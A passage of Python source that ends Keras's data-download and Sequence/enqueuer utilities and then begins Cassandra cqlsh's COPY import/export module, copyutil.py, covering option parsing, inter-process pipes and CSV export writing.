Directory](/faq/#where-is-the-keras-configuration-filed-stored).
Returns:
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' + file_hash +
' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Arguments:
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(hash) == 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Arguments:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
@tf_export('keras.utils.Sequence')
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Arguments:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Arguments:
seq: Sequence instance.
Yields:
Batches of data from the Sequence.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Arguments:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@tf_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Arguments:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Arguments:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@tf_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
return multiprocessing.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception: # pylint: disable=broad-except
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = multiprocessing.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Arguments:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
@tf_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, sequence,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of works.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
return multiprocessing.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
six.reraise(*sys.exc_info())
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import psutil
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from .util import profile_on, profile_off
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, BytesType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
None
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.items()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
